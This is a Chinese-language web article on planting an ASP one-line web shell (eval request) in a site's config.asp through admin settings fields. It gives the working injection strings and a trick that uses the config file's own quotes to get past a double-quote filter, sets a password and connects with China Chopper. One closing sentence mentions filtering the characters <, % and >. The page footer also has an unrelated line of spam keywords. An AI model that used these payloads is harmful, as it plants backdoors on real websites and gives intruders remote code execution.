請登錄后使用快捷導(dǎo)航
沒有帳號？立即注冊

淺說雙引號被過濾時一句話的插入與防范

2022-9-26 14:44| 查看: 2042 |來源: 互聯(lián)網(wǎng)

一般而言，后臺插一句話，如果數(shù)據(jù)庫擴(kuò)展名是asp的話，那么插數(shù)據(jù)庫，但是如果有配置文件可以插的話，那肯定是插入配置文件了，但是插入配置文件有一個很大的風(fēng)險，那就是一旦出錯那么全盤皆輸，有可能不僅僅造成后

一般而言，后臺插一句話，如果數(shù)據(jù)庫擴(kuò)展名是asp的話，那么插數(shù)據(jù)庫，但是如果有配置文件可以插的話，那肯定是插入配置文件了，但是插入配置文件有一個很大的風(fēng)險，那就是一旦出錯那么全盤皆輸，有可能不僅僅造成后臺無法登陸，甚至有可能是整個網(wǎng)站系統(tǒng)崩潰，所以插入配置文件，請慎之又慎。

話歸正題，如果想插入配置文件，一般是config.asp，那么首先需要了解這個文件的一般情況。

網(wǎng)站的配置一般是保存網(wǎng)站名，地址，email之類的，既然是字符，那么格式應(yīng)當(dāng)是
webname=“test website”

對于這樣的配置插入一句話的話，我們的機(jī)會就是替換test website，那么需要閉合2個"，同時要插入一句話，語句可以這樣

"%><%eval request("d"%><%s="

那么在config.asp中就是

webname=“ "%><%eval request("d"%><%s=" ”

第一個"是閉合前面的配置文件中的"，%>就是閉合前一段腳本，之后插入一句話<%eval request("d"%>，現(xiàn)在要閉合原來的"和%>

所以加入<%s="，這里特別要注意“s=”，如果沒有這個等號的話，那么就會成<%" ",這樣必將出錯。

好了，這是常規(guī)的辦法，現(xiàn)在我們回到開始那個問題，按照前面的方法插入

插入后，我們再點(diǎn)擊“網(wǎng)站設(shè)置” ，出現(xiàn)錯誤

從這個錯誤，我們可以得到2個信息。

第一，配置文件的路徑：http://www.target.com/zfbm/zfb/inc/config.asp

第二，網(wǎng)站名的變量為webname。

昨天由于很晚了，就沒繼續(xù)看，今天出差，晚上回來剛剛上Q，小刀刀就q我，說拿下了，并說這個后臺過濾了雙引號"，結(jié)合昨天的錯誤一看果然是，由于我們閉合前面雙引號起"的那個雙引號收"被過濾成單引號'，所以就成了webname=" '，這樣的話那么這個雙引號沒有閉合，由于雙引號是vbscript的控制符，沒有閉合config.asp運(yùn)行必然出錯。那么我們遇到這種雙引號被過濾了的情況改怎么辦呢。

由于插入一句話必須要用雙引號括起來，而輸入雙引號又被過濾，所以我們可以利用他們自身的雙引號來解決。

在配置文件中，我們還可以看到這樣一些設(shè)置

就是配置網(wǎng)站的公告數(shù) ，文章數(shù)等�？梢约僭O(shè)一下，他必然是整數(shù)賦值，沒有雙引號包括
num=5
num是整數(shù)型，不然就成字符了num="5"

那么我們的一句話就可以這樣構(gòu)建，如圖

在公告數(shù)中我們插入5%><%eval request(webname)%><%

必須要有5，不然將會出錯，在網(wǎng)站名中我們插入"open"

由于我們沒有輸入雙引號，不存在過濾，我們利用配置文件本身的雙引號來達(dá)到目的。那么配置文件現(xiàn)在的內(nèi)容如下
<%
....................
webname="open"
num=5%><%eval request(webname)%><%
webnum=7
.......
%>

我們的一句話就相應(yīng)為
eval request("open")，open為密碼。

用菜刀成功連接

從上可見，我們成功利用配置文件本身避開了一句話中雙引號被過濾的問題。

那么在網(wǎng)頁設(shè)計(jì)方面，我們可以增加過濾<,%,>或者組合<%,%>這些特殊符號，禁止這些符號的輸入，那么將大大增加網(wǎng)頁安全。

本文最后更新于 2022-9-26 14:44，某些文章具有時效性，若有錯誤或已失效，請?jiān)诰W(wǎng)站留言或聯(lián)系站長：[email protected]

·END·

站長網(wǎng)微信號：w17tui，關(guān)注站長、創(chuàng)業(yè)、關(guān)注互聯(lián)網(wǎng)人 - 互聯(lián)網(wǎng)創(chuàng)業(yè)者營銷服務(wù)中心

免責(zé)聲明：本站部分文章和圖片均來自用戶投稿和網(wǎng)絡(luò)收集，旨在傳播知識，文章和圖片版權(quán)歸原作者及原出處所有，僅供學(xué)習(xí)與參考，請勿用于商業(yè)用途，如果損害了您的權(quán)利，請聯(lián)系我們及時修正或刪除。謝謝！

下一篇：常用的一些注入命令總結(jié)！上一篇：upfile asp文件上傳，又一奇跡般的突破

17站長網(wǎng)微信二維碼

始終以前瞻性的眼光聚焦站長、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領(lǐng)域，為您提供最新最全的互聯(lián)網(wǎng)資訊，幫助站長轉(zhuǎn)型升級，為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營銷服務(wù)，與站長一起進(jìn)步！讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨(dú)！

掃一掃，關(guān)注站長網(wǎng)微信

精品免费在线观看-精品欧美-精品欧美成人bd高清在线观看-精品欧美高清不卡在线-精品欧美日韩一区二区

淺說雙引號被過濾時一句話的插入與防范

大家都在看

相關(guān)分類

熱門排行

最近更新